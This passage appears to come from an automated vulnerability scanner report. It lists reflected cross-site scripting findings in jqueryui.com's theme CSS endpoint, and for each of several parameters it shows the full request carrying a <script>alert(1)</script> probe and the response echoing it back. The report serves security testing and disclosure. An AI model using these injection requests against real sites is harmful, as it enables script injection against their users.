gOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a3b3b2<script>alert(1)</script>3834a03bc29&iconColorError=cd0a0a
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select,
...[SNIP]...

1.220. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHeader request parameter is copied into the HTML document as plain text between tags. The payload 89669<script>alert(1)</script>12337c89220 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff89669<script>alert(1)</script>12337c89220&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
efault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff89669<script>alert(1)</script>12337c89220&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextur
...[SNIP]...

1.221. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHighlight request parameter is copied into the HTML document as plain text between tags. The payload 12d09<script>alert(1)</script>bd625786f90 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc12d09<script>alert(1)</script>bd625786f90&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:06 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc12d09<script>alert(1)</script>bd625786f90&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/

/* Component containers
---------------
...[SNIP]...

1.222. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHover request parameter is copied into the HTML document as plain text between tags. The payload 226d6<script>alert(1)</script>a788d32d033 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000226d6<script>alert(1)</script>a788d32d033&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:46 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
OpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000226d6<script>alert(1)</script>a788d32d033&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHigh
...[SNIP]...

1.223. http://jqueryui.com/themeroller/css/parseTheme.css.php [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the ffDefault request parameter is copied into the HTML document as plain text between tags. The payload 8e61c<script>alert(1)</script>c5e6918d0b4 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif8e61c<script>alert(1)</script>c5e6918d0b4&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif8e61c<script>alert(1)</script>c5e6918d0b4&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorCont
...[SNIP]...

1.224. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fsDefault request parameter is copied into the HTML document as plain text between tags. The payload c6879<script>alert(1)</script>2e34bfe9b51 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1c6879<script>alert(1)</script>2e34bfe9b51&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:14 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1c6879<script>alert(1)</script>2e34bfe9b51&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgC
...[SNIP]...

1.225. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefaultUnit parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fsDefaultUnit request parameter is copied into the HTML document as plain text between tags. The payload d7e55<script>alert(1)</script>d46f3bcddf7 was submitted in the fsDefaultUnit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=emd7e55<script>alert(1)</script>d46f3bcddf7&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:14 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=emd7e55<script>alert(1)</script>d46f3bcddf7&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=12121
...[SNIP]...

1.226. http://jqueryui.com/themeroller/css/parseTheme.css.php [fwDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the fwDefault request parameter is copied into the HTML document as plain text between tags. The payload 9fe05<script>alert(1)</script>a3223e83584 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal9fe05<script>alert(1)</script>a3223e83584&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:13 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17886

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal9fe05<script>alert(1)</script>a3223e83584&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHea
...[SNIP]...

1.227. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorActive request parameter is copied into the HTML document as plain text between tags. The payload ea390<script>alert(1)</script>666eb3757be was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00ea390<script>alert(1)</script>666eb3757be&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:59 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00ea390<script>alert(1)</script>666eb3757be&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02
...[SNIP]...

1.228. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorContent request parameter is copied into the HTML document as plain text between tags. The payload f1be6<script>alert(1)</script>d3b6bd47496 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbbf1be6<script>alert(1)</script>d3b6bd47496&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17845

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
orHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbbf1be6<script>alert(1)</script>d3b6bd47496&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_s
...[SNIP]...

1.229. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorDefault request parameter is copied into the HTML document as plain text between tags. The payload d091e<script>alert(1)</script>c202334ef47 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

